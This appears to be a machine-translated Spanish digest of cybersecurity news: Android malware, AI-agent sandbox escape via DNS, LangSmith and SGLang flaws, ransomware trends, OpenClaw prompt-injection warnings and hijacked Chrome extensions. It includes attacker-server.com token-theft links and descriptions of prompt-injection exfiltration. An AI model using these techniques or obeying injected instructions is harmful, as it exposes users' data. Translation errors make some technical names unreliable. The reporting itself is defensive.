Investigadores de ciberseguridad han revelado una nueva familia de malware para Android llamada Perseo que se está distribuyendo activamente en la naturaleza con el objetivo de realizar adquisición de dispositivos (DTO) y fraude financiero.

Perseus se basa en los cimientos de Cerberus y Phoenix, y al mismo tiempo evoluciona hacia una «plataforma más flexible y capaz» para comprometer dispositivos Android a través de aplicaciones de cuentagotas distribuidas a través de sitios de phishing.

«A través de sesiones remotas basadas en accesibilidad, el malware permite el monitoreo en tiempo real y la interacción precisa con los dispositivos infectados, lo que permite la toma total del dispositivo y se dirige a varias regiones, con un fuerte enfoque en Turquía e Italia», ThreatFabric dicho en un informe compartido con The Hacker News.

«Más allá del robo de credenciales tradicional, Perseus monitorea las notas de los usuarios, lo que indica un enfoque en extraer información personal o financiera de alto valor».

Cerbero era documentado por primera vez por la empresa holandesa de seguridad móvil en agosto de 2019, destacando el abuso del malware del servicio de accesibilidad de Android para otorgarse permisos adicionales, así como para robar datos y credenciales confidenciales al mostrar pantallas superpuestas falsas. Tras la filtración de su código fuente en 2020, han surgido múltiples variantes, incluidas Alien, ERMAC y Fénix.

Algunos de los artefactos distribuidos por Perseo se enumeran a continuación:

• Roja App Directa (com.xcvuc.ocnsxn) – Cuentagotas
• TvTApp (com.tvtapps.live) – Carga útil de Perseo
• PolBox Tv (com.streamview.players) – Carga útil de Perseus

El análisis de ThreatFabric ha descubierto que el malware se expande en el código base de Phoenix, y los actores de amenazas probablemente dependen de un modelo de lenguaje grande (LLM) para ayudar con el desarrollo. Esto se basa en indicadores como el registro extenso en la aplicación y la presencia de emojis en el código fuente.

Al igual que con el malware Massiv para Android recientemente revelado, Perseus se hace pasar por servicios de IPTV para dirigirse a los usuarios que buscan descargar dichas aplicaciones en sus dispositivos para ver contenido premium. Las campañas que distribuyen el malware se han dirigido principalmente a Turquía, Italia, Polonia, Alemania, Francia, los Emiratos Árabes Unidos y Portugal.

«Al incorporar su carga útil dentro de este contexto esperado, el malware Perseus reduce efectivamente la sospecha de los usuarios y aumenta las tasas de éxito de la infección, combinando la actividad maliciosa con un modelo de distribución comúnmente aceptado para dichos servicios», dijo ThreatFabric.

Una vez implementado, Perseus no funciona de manera diferente a otros programas maliciosos bancarios para Android, ya que lanza ataques de superposición y captura pulsaciones de teclas para interceptar las entradas del usuario en tiempo real y muestra interfaces falsas encima de aplicaciones financieras y servicios de criptomonedas para robar credenciales.

El malware también permite al operador emitir comandos de forma remota a través de un panel de comando y control (C2) y realizar y autorizar transacciones fraudulentas. Algunos de los comandos admitidos son los siguientes:

• notas_escaneopara capturar contenidos de varias aplicaciones para tomar notas, como Google Keep, Xiaomi Notes, Samsung Notes, ColorNote Notepad Notes, Evernote, Simple Notes Pro, Simple Notes y Microsoft OneNote (especifica el nombre de paquete incorrecto «com.microsoft.onenote» en lugar de «com.microsoft.office.onenote»).
• inicio_vncpara iniciar una transmisión visual casi en tiempo real de la pantalla de la víctima.
• parada_vncpara detener la sesión remota.
• inicio_hvncpara transmitir una representación estructurada de la jerarquía de la interfaz de usuario y permitir que el actor de amenazas interactúe con los elementos de la interfaz de usuario mediante programación.
• parada_hvncpara detener la sesión remota.
• enable_accessibility_screenshotpara permitir la realización de capturas de pantalla utilizando el servicio de accesibilidad.
• desactivar_accesibilidad_captura de pantallapara desactivar la realización de capturas de pantalla utilizando el servicio de accesibilidad.
• desbloquear_aplicaciónpara eliminar una aplicación de la lista de bloqueo.
• claro_bloqueadopara borrar toda la lista de aplicaciones bloqueadas.
• acción_pantalla negrapara mostrar una pantalla superpuesta en negro para ocultar la actividad del dispositivo al usuario.
• camisónpara silenciar el audio.
• clic_coordpara realizar un toque en coordenadas de pantalla específicas.
• instalar_desde_desconocidopara forzar la instalación desde fuentes desconocidas.
• inicio_aplicaciónpara iniciar una aplicación específica.

Perseus realiza una amplia gama de comprobaciones ambientales para detectar la presencia de depuradores y herramientas de análisis como Frida y Xposed, además de verificar si se ha insertado una tarjeta SIM, determinar la cantidad de aplicaciones instaladas y si es inusualmente baja, y validar los valores de la batería para asegurarse de que esté funcionando en un dispositivo real.

Luego, el malware combina toda esta información para formular una puntuación de sospecha general que se envía al panel C2 para decidir el siguiente curso de acción y si el operador debe proceder con el robo de datos.

«Perseus destaca la evolución continua del malware para Android, demostrando cómo las amenazas modernas se basan en familias establecidas como Cerberus y Phoenix al tiempo que introducen mejoras específicas en lugar de paradigmas completamente nuevos», dijo ThreatFabric.

«Sus capacidades, que van desde control remoto basado en accesibilidad y ataques de superposición hasta monitoreo de notas, muestran un claro enfoque en maximizar tanto la interacción con el dispositivo como el valor de los datos recopilados. Este equilibrio entre la funcionalidad heredada y la innovación selectiva refleja una tendencia más amplia hacia la eficiencia y la adaptabilidad en el desarrollo de malware».

Investigadores de ciberseguridad han revelado detalles de un nuevo método para extraer datos confidenciales de entornos de ejecución de código de inteligencia artificial (IA) mediante consultas del sistema de nombres de dominio (DNS).

En un informe publicado el lunes, BeyondTrust reveló que el modo sandbox de Amazon Bedrock AgentCore Code Interpreter permite consultas DNS salientes que un atacante puede aprovechar para habilitar shells interactivos y evitar el aislamiento de la red. La emisión, que no tiene un identificador CVE, tiene una puntuación CVSS de 7,5 sobre 10,0.

Intérprete de código de Amazon Bedrock AgentCore es un servicio totalmente administrado que permite a los agentes de IA ejecutar código de forma segura en entornos aislados tipo sandboxde modo que las cargas de trabajo agentes no puedan acceder a sistemas externos. Fue lanzado por Amazon en agosto de 2025.

El hecho de que el servicio permita consultas de DNS a pesar de la configuración de «sin acceso a la red» puede permitir que «los actores de amenazas establezcan canales de comando y control y exfiltración de datos a través de DNS en ciertos escenarios, evitando los controles de aislamiento de red esperados», dijo Kinnaird McQuade, arquitecto jefe de seguridad de BeyondTrust.

En un escenario de ataque experimental, un actor de amenazas puede abusar de este comportamiento para configurar un canal de comunicación bidireccional mediante consultas y respuestas de DNS, obtener un shell inverso interactivo, filtrar información confidencial a través de consultas de DNS si su función de IAM tiene permisos para acceder a recursos de AWS, como depósitos S3 que almacenan esos datos, y ejecutar comandos.

Es más, se puede abusar del mecanismo de comunicación DNS para entregar cargas útiles adicionales que se envían al intérprete de código, lo que hace que sondee el servidor de comando y control (C2) de DNS en busca de comandos almacenados en registros DNS A, los ejecute y devuelva los resultados a través de consultas de subdominio DNS.

Vale la pena señalar que Code Interpreter requiere una función de IAM para acceder a los recursos de AWS. Sin embargo, un simple descuido puede provocar que se asigne una función con privilegios excesivos al servicio, otorgándole amplios permisos para acceder a datos confidenciales.

«Esta investigación demuestra cómo la resolución DNS puede socavar las garantías de aislamiento de la red de los intérpretes de código aislados», dijo BeyondTrust. «Al utilizar este método, los atacantes podrían haber extraído datos confidenciales de los recursos de AWS accesibles a través de la función IAM del intérprete de código, lo que podría causar tiempo de inactividad, violaciones de datos de información confidencial del cliente o infraestructura eliminada».

Tras la divulgación responsable en septiembre de 2025, Amazon determinó que se trataba de una funcionalidad prevista y no de un defecto, e instó a los clientes a utilizar modo VPC en lugar del modo sandbox para un aislamiento completo de la red. El gigante tecnológico también recomienda el uso de un cortafuegos DNS para filtrar el tráfico DNS saliente.

«Para proteger las cargas de trabajo sensibles, los administradores deben inventariar todas las instancias activas de AgentCore Code Interpreter y migrar inmediatamente aquellas que manejan datos críticos del modo Sandbox al modo VPC», dijo Jason Soroko, miembro senior de Sectigo.

«Operar dentro de una VPC proporciona la infraestructura necesaria para un aislamiento sólido de la red, lo que permite a los equipos implementar grupos de seguridad estrictos, ACL de red y firewalls DNS Route53 Resolver para monitorear y bloquear la resolución DNS no autorizada. Finalmente, los equipos de seguridad deben auditar rigurosamente las funciones de IAM adjuntas a estos intérpretes, aplicando estrictamente el principio de privilegio mínimo para restringir el radio de explosión de cualquier posible compromiso».

LangSmith es susceptible a un error de adquisición de cuentas

La divulgación se produce cuando Miggo Security reveló una falla de seguridad de alta gravedad en LangSmith (CVE-2026-25750puntuación CVSS: 8,5) que exponía a los usuarios a un posible robo de tokens y apropiación de cuentas. El problema, que afecta tanto a las implementaciones autohospedadas como a las implementaciones en la nube, se solucionó en la versión 0.12.71 de LangSmith, lanzada en diciembre de 2025.

La deficiencia se ha caracterizado como un caso de inyección de parámetros de URL derivada de una falta de validación en el parámetro baseUrl, lo que permite a un atacante robar el token de portador, la ID de usuario y la ID del espacio de trabajo de un usuario que ha iniciado sesión y transmitidos a un servidor bajo su control mediante técnicas de ingeniería social, como engañar a la víctima para que haga clic en un enlace especialmente diseñado como el siguiente:

• Nube – smith.langchain[.]es/studio/?baseUrl=https://attacker-server.com
• Autohospedado – /studio/?baseUrl=https://attacker-server.com

La explotación exitosa de la vulnerabilidad podría permitir a un atacante obtener acceso no autorizado al historial de seguimiento de la IA, así como exponer consultas SQL internas, registros de clientes de CRM o código fuente propietario mediante la revisión de llamadas a herramientas.

«Un usuario de LangSmith que haya iniciado sesión podría verse comprometido simplemente accediendo a un sitio controlado por un atacante o haciendo clic en un enlace malicioso», afirman los investigadores de Miggo, Liad Eliyahu y Eliana Vuijsje. dicho.

«Esta vulnerabilidad es un recordatorio de que las plataformas de observabilidad de IA son ahora una infraestructura crítica. Como estas herramientas priorizan la flexibilidad de los desarrolladores, a menudo pasan por alto sin darse cuenta las barreras de seguridad. Este riesgo se agrava porque, al igual que el software ‘tradicional’, los agentes de IA tienen acceso profundo a fuentes de datos internas y servicios de terceros».

Defectos de deserialización de pepinillos inseguros en SGLang

También se han señalado vulnerabilidades de seguridad en SGLang, un popular marco de código abierto para servir modelos de lenguaje grandes y modelos de IA multimodal, que, si se explotan con éxito, podrían desencadenar una deserialización insegura de pickle, lo que podría resultar en la ejecución remota de código.

Las vulnerabilidades, descubiertas por el investigador de seguridad de Orca, Igor Stepansky, siguen sin parchearse al momento de escribir este artículo. Una breve descripción de las fallas es la siguiente:

• CVE-2026-3059 (Puntuación CVSS: 9,8): una vulnerabilidad de ejecución remota de código no autenticado a través del broker ZeroMQ (también conocido como ZMQ), que deserializa datos que no son de confianza utilizando pickle.loads() sin autenticación. Afecta al módulo de generación multimodal de SGLang.
• CVE-2026-3060 (Puntuación CVSS: 9,8): una vulnerabilidad de ejecución remota de código no autenticado a través del módulo de desagregación, que deserializa datos que no son de confianza utilizando pickle.loads() sin autenticación. Afecta al sistema de desagregación paralela del codificador SGLang.
• CVE-2026-3989 (Puntuación CVSS: 7,8): el uso de una función pickle.load() insegura sin validación y deserialización adecuada en «replay_request_dump.py» de SGLang, que puede explotarse proporcionando un archivo pickle malicioso.

«Los dos primeros permiten la ejecución remota de código no autenticado contra cualquier implementación de SGLang que exponga sus características de generación o desagregación multimodal a la red», Stepansky dicho. «El tercero implica una deserialización insegura en una utilidad de reproducción de volcado de memoria».

En un aviso coordinado, el Centro de Coordinación CERT (CERT/CC) dijo que SGLang es vulnerable a CVE-2026-3059 cuando el sistema de generación multimodal está habilitado, y a CVE-2026-3060 cuando el sistema de desagregación paralela del codificador está habilitado.

«Si se cumple cualquiera de las condiciones y un atacante conoce el puerto TCP en el que el corredor ZMQ está escuchando y puede enviar solicitudes al servidor, puede explotar la vulnerabilidad enviando un archivo pickle malicioso al corredor, que luego lo deserializará», CERT/CC dicho.

Se recomienda a los usuarios de SGLang restringir el acceso a las interfaces del servicio y asegurarse de que no estén expuestos a redes que no sean de confianza. También se recomienda implementar controles de acceso y segmentación de red adecuados para evitar la interacción no autorizada con los puntos finales de ZeroMQ.

Si bien no hay evidencia de que estas vulnerabilidades hayan sido explotadas en la naturaleza, es crucial monitorear conexiones TCP entrantes inesperadas al puerto del corredor ZeroMQ, procesos secundarios inesperados generados por el proceso SGLang Python, creación de archivos en ubicaciones inusuales por el proceso SGLang y conexiones salientes del proceso SGLang a destinos inesperados.

El ransomware sigue siendo un flagelo que muestra algunos signos de ceder, pero los equipos de respuesta a incidentes y los cazadores de amenazas están más ocupados que nunca a medida que más atacantes con motivaciones financieras se apoyan exclusivamente en el robo de datos para extorsionar.

Los ataques que solo implican el robo de datos con fines de extorsión pueden no ser más frecuentes que el ransomware tradicional cuando los atacantes cifran los sistemas, pero el impulso se está moviendo en esa dirección, dijo a CyberScoop Genevieve Stark, jefa de inteligencia sobre delitos cibernéticos de Google Threat Intelligence Group.

«Cuando miras a los actores del mundo clandestino de habla inglesa, casi todos ellos se centran en la extorsión por robo de datos en este momento», añadió Stark. Esto incluye grupos como Scattered Spider, ShinyHunters, Clop y otros grupos que han sido responsables de algunos de los ataques más grandes y de mayor alcance en los últimos años.

El informe de investigación de Google Threat Intelligence Group sobre ransomware, que compartió exclusivamente y discutió con CyberScoop antes de su lanzamiento, subraya cómo la evolución y propagación del cibercrimen puede nublar una comprensión colectiva del ransomware, o ataques que utilizan malware para cifrar o bloquear sistemas.

Los ataques de ransomware también suelen incluir el robo de datos como un punto de presión adicional para la extorsión (que ocurrió en el 77% de las intrusiones de ransomware que Google observó el año pasado, frente al 57% en 2024), pero técnicamente no es ransomware a menos que esté involucrado el cifrado.

«En las intrusiones investigadas por Mandiant, observamos una disminución en la implementación de ransomware tradicional coincidiendo con un aumento en la extorsión por robo de datos», dijeron los investigadores en el informe. «Además, algunos programas de ransomware como servicio ofrecen opciones de extorsión y robo de datos únicamente, además del ransomware, lo que puede reflejar la demanda de su base de clientes».

La compañía se negó a decir a cuántos ataques de ransomware respondió en 2025. «Dudamos en compartir la cantidad de casos en los que trabajamos, en términos cuantitativos, porque es muy difícil para todos ponerse de acuerdo sobre lo que constituye un incidente versus dos», dijo Chris Linklater, líder de práctica de Mandiant. «Como anécdota, nos mantenemos muy ocupados».

Stark reconoció que desafíos importantes impiden que la industria desarrolle una imagen clara y completa de la verdadera escala e impacto del ransomware. La información se limita en gran medida a lo que las empresas individuales de respuesta a incidentes ven en sus propios casos, y la información que se comparte generalmente se proporciona caso por caso, más bien de forma centralizada.

«No estamos haciendo un gran trabajo como industria al analizar el volumen. Creo que dependemos demasiado de cosas como el volumen de los sitios de fuga de datos, que tienen muchos problemas», afirmó.

Es probable que el aumento de la extorsión de datos esté impulsando un aumento de estas publicaciones. Al mismo tiempo, algunos grupos de amenazas hacen afirmaciones no creíbles o reciclan infracciones anteriores y las afirman como obra propia. «Los sitios de fuga de datos como medida son en realidad bastante pobres, y creo que como industria hemos confiado demasiado en eso», dijo Stark.

Sin embargo, los datos siguen siendo útiles para evaluar ciertas tendencias, como cambios en los objetivos o un aumento de presuntos ataques a sectores o regiones específicos, dijeron los investigadores.

Por si sirve de algo, Google dijo que la cantidad de publicaciones en sitios de fuga de datos aumentó un 48% respecto al año anterior a 7.784 publicaciones en 2025. Mientras tanto, la cantidad de sitios únicos de fuga de datos aumentó casi un 35% durante el mismo período a 128 sitios con al menos una publicación.

El informe de Google también se centra en las tácticas y los cambios que observó durante su respuesta a los ataques de ransomware el año pasado, incluidas las formas más comunes en que los atacantes irrumpieron en los sistemas, las familias de ransomware más destacadas y un mayor ataque a la infraestructura de virtualización.

Las vulnerabilidades explotadas fueron el principal vector de acceso inicial en los ataques de ransomware el año pasado, representando un tercio de todos los incidentes, seguidas de diversas formas de compromiso web y credenciales robadas. Los atacantes explotaron con mayor frecuencia vulnerabilidades en redes privadas virtuales y firewalls ampliamente utilizados de Fortinet, SonicWall, Palo Alto Networks y Citrix, dijeron los investigadores.

Zach Riddle, analista principal de inteligencia de amenazas en GTIG, dijo que esto no refleja tanto una tendencia creciente como un ciclo recurrente de diferentes vectores de acceso inicial, que aumentan y disminuyen año tras año por diversas razones.

Google mencionó específicamente 13 vulnerabilidades, muchas de ellas reveladas hace años, y clasificó esos defectos entre las vulnerabilidades más explotadas para ataques de ransomware el año pasado. Tres de esas vulnerabilidades afectan a los productos de Fortinet, seguidas de dos de Microsoft, dos de Veritas y una de SonicWall, Citrix, SAP, Palo Alto Networks, CrushFTP y Zoho.

Las credenciales robadas fueron el punto de acceso inicial en el 21% de las intrusiones de ransomware el año pasado, y los atacantes a menudo usaban esas credenciales para autenticarse en la VPN o el protocolo de escritorio remoto de la víctima, dijo Google en el informe.

Los atacantes también enfrentan más desafíos al implementar ransomware una vez que ingresan a las redes de las víctimas. «De hecho, estamos viendo una disminución en la implementación exitosa de ransomware», dijo Bavi Sadayappan, analista senior de inteligencia de amenazas de GTIG. Google observó una disminución año tras año del 54% en 2024 al 36% el año pasado.

Otro cambio histórico que se refleja en la actividad de ransomware en 2025 implica una mayor focalización en la infraestructura de virtualización, como los hipervisores VMware ESXi. Los atacantes se dirigieron a estos entornos en el 43% de las intrusiones de ransomware el año pasado, frente al 29% en 2024.

«Permite que el atacante ataque una gran cantidad de sistemas con un esfuerzo muy pequeño», dijo Linklater, y agregó que «hace que la investigación sea significativamente más difícil de lograr, porque se pierde mucha más evidencia forense cuando se ataca a esos hipervisores».

Las familias de ransomware más destacadas en 2025 incluyeron Agenda, Redbike, Clop, Playcrypt, Safepay, Inc, RansomHub y Fireflame, según Google. Las marcas de ransomware más activas el año pasado incluyeron Qilin, Akira, Clop, Play, Safepay, Inc, Lynx, RansomHub, DragonForce y Sinobi.

El Equipo Técnico de Respuesta a Emergencias de la Red Nacional de Computadoras de China (CNCERT) ha emitido una advertencia sobre la seguridad derivada del uso de OpenClaw (antes Clawdbot y Moltbot), un agente autónomo de inteligencia artificial (IA) autónomo, de código abierto y autohospedado.

En una publicación compartida en WeChat, CNCERT señaló que las «configuraciones de seguridad predeterminadas inherentemente débiles» de la plataforma, junto con su acceso privilegiado al sistema para facilitar las capacidades de ejecución autónoma de tareas, podrían ser exploradas por malos actores para tomar el control del punto final.

Esto incluye riesgos que surgen de inyecciones rápidas, donde instrucciones maliciosas incrustadas en una página web pueden hacer que el agente filtre información confidencial si se le engaña para que acceda y consuma el contenido.

El ataque también es referido como inyección rápida indirecta (IDPI) o inyección rápida entre dominios (XPIA), ya que los adversarios, en lugar de interactuar directamente con un modelo de lenguaje grande (LLM), utilizan funciones benignas de IA como armas como el resumen de páginas web o el análisis de contenido para ejecutar instrucciones manipuladas. esto puede rango de evadir los sistemas de revisión de anuncios basados ​​en inteligencia artificial e influir en las decisiones de contratación para envenenar la optimización de motores de búsqueda (SEO) y generar respuestas sesgadas al suprimir las críticas negativas.

OpenAI, en una publicación de blog publicada a principios de esta semana, dijo que los ataques rápidos de estilo inyección están evolucionando más allá de simplemente colocar instrucciones en contenido externo para incluir elementos de ingeniería social.

«Los agentes de IA son cada vez más capaces de navegar por la web, recuperar información y realizar acciones en nombre de un usuario», afirma. dicho. «Esas capacidades son útiles, pero también crean nuevas formas para que los atacantes intenten manipular el sistema».

Los riesgos de inyección rápida en OpenClaw no son hipotéticos. El mes pasado, investigadores de PromptArmor descubrieron que el función de vista previa del enlace en aplicaciones de mensajería como Telegram o Discord se puede convertir en una vía de filtración de datos cuando se comunica con OpenClaw mediante una inyección rápida indirecta.

La idea, a alto nivel, es engañar al agente de IA para que genere una URL controlada por el atacante que, cuando se presenta en la aplicación de mensajería como una vista previa del enlace, automáticamente hace que transmita datos confidenciales a ese dominio sin tener que hacer clic en el enlace.

«Esto significa que en sistemas de agentes con vistas previas de enlaces, la filtración de datos puede ocurrir inmediatamente después de que el agente de IA responda al usuario, sin que el usuario tenga que hacer clic en el enlace malicioso», dijo la compañía de seguridad de IA. dicho. «En este ataque, el agente es manipulado para construir una URL que utiliza el dominio de un atacante, con parámetros de consulta generados dinámicamente adjuntos que contienen datos confidenciales que el modelo conoce sobre el usuario».

Además de las indicaciones deshonestas, CNCERT también ha destacado otras tres preocupaciones:

• La posibilidad de que OpenClaw pueda eliminar inadvertida e irrevocablemente información crítica debido a una mala interpretación de las instrucciones del usuario.
• Los actores de amenazas pueden cargar habilidades maliciosas en repositorios como ClawHub que, cuando se instalan, ejecutan comandos arbitrarios o implementan malware.
• Los atacantes pueden aprovechar las vulnerabilidades de seguridad reveladas recientemente en OpenClaw para comprometer el sistema y filtrar datos confidenciales.

«Para sectores críticos, como las finanzas y la energía, tales violaciones podrían conducir a la fuga de datos comerciales centrales, secretos comerciales y repositorios de códigos, o incluso resultar en la parálisis completa de sistemas comerciales completos, causando pérdidas incalculables», agregó CNCERT.

Para contrarrestar estos riesgos, se recomienda a los usuarios y organizaciones fortalecer los controles de red, evitar la exposición del puerto de administración predeterminado de OpenClaw a Internet, aislar el servicio en un contenedor, evitar almacenar credenciales en texto sin formato, descargar habilidades solo de canales confiables, deshabilitar las actualizaciones automáticas de habilidades y mantener actualizado al agente.

El desarrollo se produce cuando las autoridades chinas han tomado medidas para restringir que las empresas estatales y las agencias gubernamentales ejecuten aplicaciones OpenClaw AI en computadoras de oficina en un intento por contener los riesgos de seguridad, Bloomberg. reportado. Se dice que la prohibición también se extiende a las familias del personal militar.

La popularidad viral de OpenClaw también ha llevado a los actores de amenazas a aprovechar el fenómeno para distribuir repositorios maliciosos de GitHub haciéndose pasar por instaladores de OpenClaw para implementar ladrones de información como Atomic y Vidar Stealer, y un malware proxy basado en Golang conocido como calcetines fantasma usando instrucciones estilo ClickFix.

«La campaña no estaba dirigida a una industria en particular, sino que estaba dirigida en general a usuarios que intentaban instalar OpenClaw con repositorios maliciosos que contenían instrucciones de descarga para entornos Windows y macOS», Huntress dicho. «Lo que hizo que esto fuera exitoso fue que el malware estaba alojado en GitHub, y el repositorio malicioso se convirtió en la sugerencia mejor calificada en los resultados de búsqueda de IA de Bing para OpenClaw Windows».

Según un reciente informeel Departamento de Estado envió un cable instando a los diplomáticos estadounidenses a oponerse a las regulaciones internacionales de soberanía de datos como GDPR, caracterizando estas barreras como “innecesariamente gravosas”.

En el cable, el Departamento de Estado afirma que las regulaciones de soberanía de datos “perturban los flujos globales de datos, aumentan los costos y los riesgos de ciberseguridad, limitan la Inteligencia Artificial (IA) y los servicios en la nube, y amplían el control gubernamental de maneras que pueden socavar las libertades civiles y permitir la censura”.

Este argumento se sustenta tanto en una preocupación legítima como en un error crítico.

La verdad es que la soberanía de los datos real es técnica, no territorial.

La localización de datos es un instrumento contundente que intenta resolver un problema sofisticado. Exigir que los datos permanezcan dentro de límites geográficos en realidad no garantiza que los propietarios de los datos conserven el control sobre cómo se accede, se utiliza o se comparte su información. La gente se mueve; los puntos finales se mueven; los datos deben moverse.

Los reguladores europeos han ya definido lo que realmente requiere la soberanía digital. Específicamente, después de Schrems II, la Junta Europea de Protección de Datos dejó en claro que la soberanía se preserva cuando los datos están fuertemente cifrados y las claves de cifrado permanecen únicamente bajo el control del propietario de los datos en Europa. Esa claridad a menudo se pierde en debates geopolíticos más amplios.

La verdadera soberanía de los datos requiere que los gobiernos, las empresas y los ciudadanos conserven la autoridad criptográfica sobre quién puede acceder a su información, independientemente de dónde se procese. Obligar a que los datos se mantengan dentro de las fronteras nacionales sirve de poco si los proveedores extranjeros todavía tienen las llaves. La soberanía es fundamentalmente un desafío técnico: depende de controlar el acceso mediante cifrado y autenticación, no simplemente controlar la ubicación física.

Existe una creencia generalizada de que la soberanía de los datos es perjudicial para la innovación, el comercio y la seguridad nacional. Esta es una idea errónea.

El memorando presenta una opción falsa: que debemos aceptar flujos de datos transfronterizos sin restricciones con protecciones mínimas para el propietario de los datos, o implementar requisitos de localización onerosos que sofocan la innovación y la colaboración.

Esto simplemente no es cierto, y el auge de la seguridad centrada en datos lo demuestra: desde Estados Unidos hasta las naciones de los Cinco Ojos y el Indo-Pacífico, los líderes de seguridad están adoptando este modelo. En lugar de centrar los esfuerzos únicamente en construir un límite perimetral sólido, los controles y las políticas deben seguir los datos mismos, dondequiera que se muevan, proporcionando una seguridad más resiliente y contextual para los datos mismos. Este es el pilar central de la La propia estrategia Zero Trust del DoWy el modelo para agencias de todo el gobierno federal de EE. UU. y más allá.

Incluso el propio Departamento de Estado ITAR (el Reglamento de Tráfico Internacional de Armas de EE. UU.) tratar los datos confidenciales sobre municiones con requisitos específicos de la ubicación. Hay buenas razones para proteger algunos tipos de información sensible de los ojos externos.

El contexto importa. No deberíamos desmantelar estándares de soberanía de datos bien establecidos sin contar con alternativas técnicas claras. En cambio, debemos evaluar cómo proteger y gobernar de manera más efectiva los datos confidenciales, sin impedir el libre flujo de información.

La seguridad centrada en los datos fortalece la soberanía de los datos y libera flujos de datos seguros.

Al cambiar el enfoque de los muros (protecciones, localización y perímetros específicos de fronteras) a los datos en sí, se pueden transformar fundamentalmente los flujos de datos globales. Cuando los datos realmente se controlan, etiquetan y comprenden, pueden moverse de forma segura, a través de canales confiables, para lograr el éxito de la misión.

En un entorno de seguridad centrado en datos, una agencia gubernamental puede aprovechar los servicios en la nube de cualquier proveedor y, al mismo tiempo, mantener el control soberano sobre la información confidencial mediante la administración y el alojamiento de sus propias claves de cifrado, además de brindar resiliencia frente a infracciones de terceros con proveedores de servicios en la nube u otros socios.

Esto no es teórico. Actualmente se están produciendo arquitecturas de seguridad modernas centradas en datos, con estándares abiertos como el Formato de datos confiable permitiendo el intercambio de datos global e independiente de la plataforma entre socios. Es la antítesis de un silo de datos, que permite que los datos viajen en condiciones muy específicas y con una gobernanza adjunta a cada objeto de datos. el Reino Unido Operación Mástil Alto es un excelente ejemplo del éxito que se obtiene al compartir datos dinámicos e inteligentes entre socios confiables.

En una era definida por la aceleración de la IA y la competencia geopolítica, la soberanía y la interoperabilidad deben diseñarse para reforzarse mutuamente, no enmarcarse como compensaciones.

Dos extensiones de Google Chrome se han vuelto maliciosas tras lo que parece ser un caso de transferencia de propiedadofreciendo a los atacantes una forma de enviar malware a clientes posteriores, inyectar código arbitrario y recopilar datos confidenciales.

Las extensiones en cuestión, ambas originalmente asociadas con un desarrollador llamado «akshayanuonline@gmail.com» (BuildMelon), se enumeran a continuación:

• QuickLens – Pantalla de búsqueda con Google Lens (ID: kdenlnncndfnhkognokgfpabgkgehodd) – 7000 usuarios
• ShotBird: desplazamiento de capturas de pantalla, imágenes de tweets y editor (ID: gengfhhkjekmlejbhmmopegofnoifnjp) – 800 usuarios

Si bien QuickLens ya no está disponible para descargar desde Chrome Web Store, ShotBird permanece accesible al momento de escribir este artículo. ShotBird fue lanzado originalmente en noviembre de 2024, con su desarrollador, Akshay Anu S (@AkshayAnuOnline), reclamando en X que la extensión es adecuada para «crear imágenes profesionales tipo estudio» y que todo el procesamiento se realiza localmente.

De acuerdo a investigación Publicado por monxresearch-sec, el complemento del navegador recibió una marca de «Destacado» en enero de 2025, antes de pasarlo a un desarrollador diferente («loraprice198865@gmail.com») en algún momento del mes pasado.

De manera similar, QuickLens fue puesto a la venta en ExtensionHub el 11 de octubre de 2025 por «akshayanuonline@gmail.com» apenas dos días después de su publicación, John Tuckner de Anexo Security. dicho. El 1 de febrero de 2026, el propietario de la extensión cambió a «support@doodlebuggle.top» en la página de listado de Chrome Web Store.

La actualización maliciosa introducida a QuickLens el 17 de febrero de 2026 mantuvo la funcionalidad original pero introdujo capacidades para eliminar encabezados de seguridad (por ejemplo, X-Frame-Options) de cada respuesta HTTP, lo que permite que scripts maliciosos inyectados en una página web realicen solicitudes arbitrarias a otros dominios, omitiendo la Política de seguridad de contenido (CSP) protecciones.

Además, la extensión contenía código para tomar huellas digitales del país del usuario, detectar el navegador y el sistema operativo, y sondea un servidor externo cada cinco minutos para recibir JavaScript, que se almacena en el almacenamiento local del navegador y se ejecuta en cada carga de página agregando un GIF oculto de 1×1. elemento y estableciendo la cadena JavaScript como su atributo «onload». Esto, a su vez, hace que el código malicioso se ejecute una vez cargada la imagen.

«El código malicioso real nunca aparece en los archivos fuente de la extensión», explicó Tuckner. «El análisis estático muestra una función que crea elementos de imagen. Eso es todo. Las cargas útiles se entregan desde el C2 y se almacenan en el almacenamiento local; sólo existen en tiempo de ejecución».

Un análisis similar de la extensión ShotBird realizado por monxresearch-sec ha descubierto el uso de devoluciones de llamada directas para entregar código JavaScript en lugar de crear una imagen de 1×1 píxeles para activar la ejecución. El JavaScript está diseñado para mostrar un mensaje falso de actualización del navegador Google Chrome, haciendo clic en qué usuarios reciben una página estilo ClickFix para abrir el cuadro de diálogo Ejecutar de Windows, iniciar «cmd.exe» y pegar un comando de PowerShell, lo que resulta en la descarga de un ejecutable llamado «googleupdate.exe» en los hosts de Windows.

Luego, el malware procede a enlazar la entrada, el área de texto, seleccionar elementos HTML y capturar cualquier dato ingresado por la víctima. Esto podría incluir credenciales, PIN, detalles de tarjetas, tokens e identificadores gubernamentales. También está equipado para desviar datos almacenados en el navegador web Chrome, como contraseñas, historial de navegación e información relacionada con extensiones.

«Esta es una cadena de abuso de dos etapas: control remoto del navegador del lado de la extensión más pivote de ejecución a nivel de host a través de actualizaciones falsas», dijo el investigador. «El resultado es una exposición de datos de alto riesgo en el navegador y una ejecución confirmada de secuencias de comandos del lado del host en al menos un sistema afectado. En términos prácticos, esto eleva el impacto del abuso exclusivo del navegador a un posible robo de credenciales y un compromiso más amplio de los terminales».

Se evalúa que el mismo actor de amenazas está detrás del compromiso de las dos extensiones y está operando dichos complementos en paralelo, dado el uso de un patrón de arquitectura de comando y control (C2) idéntico, los señuelos ClickFix inyectados en el contexto de navegación y la transferencia de propiedad como vector de infección.

Curiosamente, el desarrollador de la extensión original ha publicado varios otro extensiones bajo su nombre en Chrome Web Store y todos ellos han recibido una insignia de Destacados. El desarrollador también tiene un cuenta en ExtensionHubaunque actualmente no hay extensiones a la venta. Es más, el individuo tiene atentado para vender dominios como «AIInfraStack[.]com» por $2500, indicando que el «dominio de palabras clave fuertes» es «relevante para [sic] Ecosistema de IA en rápido crecimiento».

«Este es, en pocas palabras, el problema de la extensión de la cadena de suministro», dijo Anexo Security. «Una extensión funcional ‘destacada’, revisada, cambia de manos y el nuevo propietario envía una actualización armada a cada usuario existente».

La divulgación se produce cuando Microsoft advirtió sobre las extensiones maliciosas del navegador basadas en Chromium que se hacen pasar por herramientas legítimas de asistencia de inteligencia artificial para recopilar historiales de chat de LLM y datos de navegación.

